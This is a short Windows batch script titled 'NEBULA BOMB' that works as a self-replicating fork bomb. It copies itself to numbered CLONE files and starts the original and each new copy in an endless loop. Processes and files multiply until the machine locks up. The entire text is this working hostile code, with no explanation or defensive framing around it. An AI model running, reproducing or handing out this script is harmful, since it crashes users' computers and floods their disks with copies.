@ECHO OFF >NUL
TITLE NEBULA BOMB & COLOR 0A
MODE CON COLS=80 LINES=25 & CLS
SET "HOST=%0"
SET "SERIAL=1"
:START
:CLONE
IF NOT EXIST CLONE%SERIAL%.BAT (
COPY /Y %HOST% "CLONE%SERIAL%.BAT"
) ELSE (
SET /A SERIAL=%SERIAL%+1
GOTO CLONE
)
FOR %%A IN (%HOST%, CLONE%SERIAL%.bat) DO (
START %%A
)
GOTO START
@EXIT /B